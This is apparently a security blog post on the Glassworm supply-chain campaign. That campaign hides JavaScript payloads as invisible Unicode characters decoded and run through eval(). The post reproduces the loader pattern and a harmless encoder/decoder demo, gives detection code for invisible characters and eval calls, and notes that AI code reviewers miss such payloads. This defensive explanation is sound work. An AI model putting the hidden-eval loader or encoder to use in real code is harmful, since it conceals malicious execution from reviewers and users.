

Between March 3 and 9, 2026, Aikido Security documented 151 malicious packages uploaded across GitHub repositories, npm, and the VS Code/Open VSX marketplace. The campaign is called Glassworm, and it’s back for a second wave after first appearing in March 2025.

What makes Glassworm different from most supply chain attacks is the technique. The malicious payload is invisible. Not obfuscated. Not minified. Invisible.

I’ve been writing about AI security threats and supply chain risks for a while. Glassworm is the kind of attack that should change how you think about what “reviewing code” actually means.

How it works

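Unicode has two ranges of invisible characters that matter here: U+FE00 to U+FE0F and U+E0100 to U+E01EF. Coverage of this campaign usually labels them Private Use Area (PUA) characters, though strictly speaking both ranges are variation selectors, which exist to adjust how the preceding character is drawn. These characters are valid Unicode. They exist in the spec. But on their own they don’t render. Not in VS Code. Not in your terminal. Not in GitHub’s diff view. Not in any standard code review interface.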

Glassworm encodes malicious JavaScript payloads as sequences of these invisible characters, stuffed inside what looks like an empty string. The actual code in the file looks something like this:

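```javascript
// Map each invisible character back to a byte value (0-255); drop anything else.
const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);

// The template literal looks empty, but it carries the hidden payload.
eval(Buffer.from(s(``)).toString('utf-8'));
```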

Those backticks at the end look empty. They’re not. They contain hundreds of invisible PUA characters that, when decoded by the function above, produce a full malicious payload. The eval() executes it at runtime. No visible trace in the source file.
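
To make the trick concrete, here is a minimal round-trip sketch using a harmless string. The `encode` helper is a hypothetical illustration (simply the inverse of the decoder above, not something recovered from the malware), and the decoded text is only compared and printed, never passed to eval().

```javascript
// Hypothetical helper for building a harmless test fixture: hides each UTF-8
// byte as one invisible character (the inverse of the decoder shown above).
const encode = (text) =>
  [...Buffer.from(text, 'utf-8')]
    .map((b) => String.fromCodePoint(b < 16 ? 0xFE00 + b : 0xE0100 + (b - 16)))
    .join('');

// Same mapping as the sample's decoder, spelled out for readability.
const decode = (hidden) =>
  [...hidden]
    .map((ch) => {
      const cp = ch.codePointAt(0);
      if (cp >= 0xFE00 && cp <= 0xFE0F) return cp - 0xFE00;
      if (cp >= 0xE0100 && cp <= 0xE01EF) return cp - 0xE0100 + 16;
      return null; // not part of the hidden alphabet
    })
    .filter((n) => n !== null);

const message = 'hidden in plain sight';
const hidden = encode(message);
const recovered = Buffer.from(decode(hidden)).toString('utf-8');

console.log(`[${hidden}]`);          // most terminals show what looks like []
console.log([...hidden].length);     // one invisible code point per byte
console.log(recovered === message);  // the text survives the round trip
```

The same `decode` function is handy on the defensive side: if you find a suspicious "empty" string, you can decode it and read the result as text instead of executing it.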

The decoded payloads steal tokens, credentials, and secrets, using the Solana blockchain as the command-and-control channel to make the exfiltration harder to trace and block.

Why this is harder to catch than you think

Traditional code review fails completely against this. A human looking at the diff sees a small utility function and an empty string. Syntax highlighting doesn’t flag it. Linting doesn’t catch it because the characters are valid Unicode. Grep doesn’t find it unless you already know which code points to search for, because you can’t type a pattern for characters you can’t see.

AI code review tools face the same problem. They operate on the visible text of the code. If the malicious content is invisible characters inside a string literal, the model sees an empty string. The Anthropic Code Review tool that launched this month dispatches agents to analyze PRs for bugs and security issues. But if the payload isn’t visible in the code representation the model receives, it doesn’t get analyzed.

And Glassworm’s operators are making detection even harder. The visible parts of malicious commits, the parts humans and AI can see, are deliberately convincing. Documentation tweaks. Version bumps. Minor bug fixes. Stylistically consistent with the target repository. Security researchers believe attackers are using LLMs to generate these cover changes at scale across 151+ different codebases.

So you have AI generating realistic-looking innocent commits to cover payloads that are invisible to both human reviewers and AI reviewers. That’s a new class of problem.

What this means for your team

If you’re pulling npm packages, installing VS Code extensions, or depending on open source libraries (so, everyone), here’s what matters:

Your current review process probably doesn’t detect this. Unless your toolchain specifically scans for Unicode PUA characters in source files, invisible payloads pass through. Snyk’s analysis recommends detecting Unicode characters by category rather than maintaining explicit character lists, which means your existing SAST tools need updating.
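
As a rough illustration of category-based detection, the sketch below flags runs of characters that normally render as nothing. The function name `findInvisibleRuns`, the choice of classes (variation selectors, format characters, private-use characters), and the `minRun` threshold of 4 are all assumptions of mine, not Snyk's or Aikido's actual rules. The threshold exists because emoji legitimately use one or two of these characters in a row.

```javascript
// Runs of characters that usually render as nothing: variation selectors,
// format characters (general category Cf), and private-use characters (Co).
const INVISIBLE_RUN = /[\p{Variation_Selector}\p{Cf}\p{Co}]+/gu;

// Report every run of at least `minRun` invisible code points.
// `minRun = 4` is an assumed threshold; tune it for your codebase.
function findInvisibleRuns(source, minRun = 4) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    for (const match of text.matchAll(INVISIBLE_RUN)) {
      const count = [...match[0]].length; // count code points, not UTF-16 units
      if (count >= minRun) {
        findings.push({ line: i + 1, column: match.index + 1, count });
      }
    }
  });
  return findings;
}

// Line 1 hides eight invisible characters inside a template literal;
// line 2 is an ordinary emoji with a single variation selector.
const sample =
  'const token = `' + '\u{E0100}'.repeat(8) + '`;\n' +
  'const heart = "\u2764\uFE0F";';

console.log(findInvisibleRuns(sample));
```

In this sample, only the first line should be reported; the emoji on the second line stays under the threshold. A real scanner would also need an allowlist for files that legitimately contain such characters, such as localization data.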

Pin your dependencies and audit updates. Glassworm targets existing repos with seemingly innocent version bumps and doc changes. If you auto-merge dependency updates or trust patch versions without review, you’re exposed.
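
A quick way to see how exposed you are is to list every dependency declared with a version range instead of an exact version. This is a minimal sketch: `findUnpinned` and the example manifest are hypothetical, and the regex only recognizes plain `x.y.z` versions, so anything else (ranges, tags, git URLs) is reported as unpinned.

```javascript
// Exact versions only: 1.2.3, optionally with prerelease or build metadata.
const EXACT_VERSION = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/;

// Return every dependency whose version spec is not an exact version.
function findUnpinned(pkg) {
  const sections = ['dependencies', 'devDependencies', 'optionalDependencies'];
  const unpinned = [];
  for (const section of sections) {
    for (const [name, spec] of Object.entries(pkg[section] ?? {})) {
      if (!EXACT_VERSION.test(spec)) unpinned.push({ section, name, spec });
    }
  }
  return unpinned;
}

// Hypothetical manifest, for illustration only.
const examplePkg = {
  dependencies: { 'left-pad': '1.3.0', 'some-lib': '^2.4.1' },
  devDependencies: { 'some-tool': '~0.9.0' },
};

console.log(findUnpinned(examplePkg));
```

Pinning direct dependencies doesn't pin transitive ones. For that you still need a committed lockfile and an install step that respects it, such as `npm ci`.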

Scan for eval() and dynamic execution patterns. The invisible payload still needs eval() or an equivalent to execute. Static analysis rules that flag dynamic code execution in dependency code are your best early warning.
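
Here is a deliberately crude sketch of such a rule. The pattern list and the `findDynamicExec` name are assumptions for illustration; a production rule would work on the parsed syntax tree rather than on regexes, which are easy to evade with aliasing or string concatenation.

```javascript
// Crude, regex-based heuristics for dynamic code execution in JavaScript.
const DYNAMIC_EXEC_PATTERNS = [
  { name: 'eval', re: /\beval\s*\(/ },
  { name: 'Function constructor', re: /\bnew\s+Function\s*\(/ },
  { name: 'vm module', re: /\bvm\.(?:runInThisContext|runInNewContext|runInContext)\s*\(/ },
];

// Return the line number and pattern name for every suspicious line.
function findDynamicExec(source) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    for (const { name, re } of DYNAMIC_EXEC_PATTERNS) {
      if (re.test(text)) findings.push({ line: i + 1, pattern: name });
    }
  });
  return findings;
}

// The second line mirrors the shape of the Glassworm loader shown earlier.
const snippet = [
  'const add = (a, b) => a + b;',
  "eval(Buffer.from(s(``)).toString('utf-8'));",
].join('\n');

console.log(findDynamicExec(snippet));
```

Expect false positives from build tools and template engines. The point is to get a short list of dependency files worth a closer look, not a verdict.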

Be suspicious of repos you haven’t verified recently. Some of the compromised repos had over 1,400 GitHub stars. Popularity doesn’t mean safety. The Wasmer WebAssembly runtime was among the targeted projects.

VS Code extensions are a vector. Glassworm hit the Open VSX marketplace too. Extensions run with significant privileges. If your team installs extensions casually, you have an unmonitored attack surface.

The bigger picture

I’ve written about AI security as a culture problem and building systems that don’t break under attack. Glassworm sits at the intersection of two trends I keep coming back to.

First, AI is accelerating both sides. Defenders are using AI to review code faster. Attackers are using AI to generate convincing cover commits at scale. The speed advantage isn’t one-sided.

Second, the supply chain is where the risk concentrates. Your code might be clean. Your review process might be solid. But if one of your 400 transitive dependencies gets compromised with an invisible payload that no human or AI reviewer can see, none of that matters.

Glassworm didn’t exploit a zero-day. It didn’t find a novel vulnerability. It exploited the gap between what we look at and what we actually see. That gap is getting wider as codebases grow faster, reviews get thinner, and both attackers and defenders use AI to scale.

The fix isn’t one tool or one policy. It’s treating your supply chain with the same paranoia you’d treat your own production code. Because right now, for a lot of teams, that’s the door nobody’s watching.

Seen something like Glassworm in your own supply chain? Dealing with invisible threats in your dependencies? I’d love to hear about it. Find me on X or Telegram.